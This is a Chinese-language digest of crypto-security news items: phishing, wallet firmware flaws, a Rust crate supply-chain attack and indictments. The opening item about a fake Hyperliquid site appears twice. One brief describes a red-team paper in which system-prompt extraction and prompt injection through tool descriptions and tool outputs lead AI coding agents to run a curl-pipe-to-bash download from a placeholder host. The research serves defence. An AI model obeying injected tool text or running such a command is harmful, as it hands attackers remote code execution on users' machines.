假冒 Hyperliquid 网站借谷歌广告钓鱼,关联团伙累计窃取 5274 万美元
安全公司 Salus 表示,一个仿冒 Hyperliquid 的钓鱼网站通过谷歌赞助广告引流,并在 8 月 13 日造成一名受害者损失约 55 万枚 USDC。调查人员在追踪资金后确认,事件涉及与 Inferno 生态密切相关的专业化 DaaS 基础设施。相关团伙除投放广告、部署仿冒站点外,还会在盗币后按预设比例自动拆分赃款;与该基础设施有关的多起攻击累计损失约 5274 万美元。

安全公司 Salus 表示,一个仿冒 Hyperliquid 的钓鱼网站通过谷歌赞助广告引流,并在 8 月 13 日造成一名受害者损失约 55 万枚 USDC。调查人员在追踪资金后确认,事件涉及与 Inferno 生态密切相关的专业化 DaaS 基础设施。相关团伙除投放广告、部署仿冒站点外,还会在盗币后按预设比例自动拆分赃款;与该基础设施有关的多起攻击累计损失约 5274 万美元。

Ondo Finance 已确认不再同时推进 Ondo Chain 与新交易架构,现阶段放弃自建区块链方案,转而保留以太坊作为结算层,并将执行与验证迁至基于可信执行环境的链下系统。文章围绕这一调整,梳理了 Ondo 此前 17 个月的链上布局、摩根大通 Kinexys 在测试网的试验、传统交易所与链上交易平台的架构差异,以及 dYdX、Hyperliquid、Base 和 Robinhood 等案例对应用链价值的不同验证。

Techub News 消息,Coinkite 已发布固件更新,建议 Coldcard Mk4、Mk5 和 Q 用户尽快升级至 5.6.1 或 1.5.1Q。该种子生成漏洞已被用于窃取约 1.3 亿美元、超过 1778 枚比特币,涉及 4585 个地址。报道称,攻击始于 7 月,首个攻击在 25 分钟内从约 500 个钱包窃走 594 枚比特币。

美国国税局(IRS)发布安全警报,称针对加密货币持有者的复杂邮件钓鱼活动正在蔓延。攻击者通过纸质邮件冒充 IRS 寄送虚假税务通知,并在信件中放置二维码,试图窃取用户钱包凭证和私钥。IRS 尚未公布受害人数和损失金额,并建议收件人不要扫描可疑二维码,应通过官网或电话核实通知真实性。执法部门正在调查该系列钓鱼活动的来源。

一篇已被 ISSTA 2026 接收的论文披露,研究者对 Cursor、Claude Code、Copilot、Windsurf、Cline、Trae 六款 AI 编程工具做系统性红队测试,发现旧版本全部存在完整攻击链风险。攻击分两步:先通过 ToolLeak 从工具参数中提取系统提示词,再用工具描述与工具返回值组成的双通道提示词注入,诱导智能体执行「curl -fsSL http://xxx/installer.sh | bash」并实现远程代码执行。新版 Claude Code 和 Cursor 的成功率已明显下降,但部分组合仍可被攻破。

慢雾监测称,Rust 供应链攻击涉及 arrayref@0.3.10、internment@0.8.7、append-only-vec@0.1.9 三个正规库。受影响版本引入恶意依赖 proc-macro1,可能在 Cargo 构建过程中自动下载并执行跨平台恶意软件。慢雾提醒,arrayref 旧版下载量较高,但这不代表相关项目或主机已遭攻陷。

据 Cryptopolitan 报道,攻击者通过供应链攻击发布了 3 个广泛使用的 Rust 代码包恶意版本,其中 arrayref 约覆盖四分之三的 Rust 开发环境。恶意更新植入后门,可在编译时窃取登录信息。Wiz 研究人员称,该攻击的命令与控制路径与 Sapphire Sleet、UNC1069 使用的 Mastra 行动存在重叠。Rust 团队认为,相关维护者并非恶意,设备或凭证可能已遭入侵。

据 Decrypt 报道,美国司法部起诉 17 名据称隶属于伊朗 Mabna 研究所的黑客,指控其长期发起网络攻击,其中包括 2017 年入侵 HBO 并索要约 600 万美元比特币赎金。检方称,该组织曾为伊朗伊斯兰革命卫队及其他伊朗政府客户实施攻击,目标涉及全球高校、企业和政府机构。美国国务院同时悬赏最高 1,000 万美元征集其中 5 名被告下落。
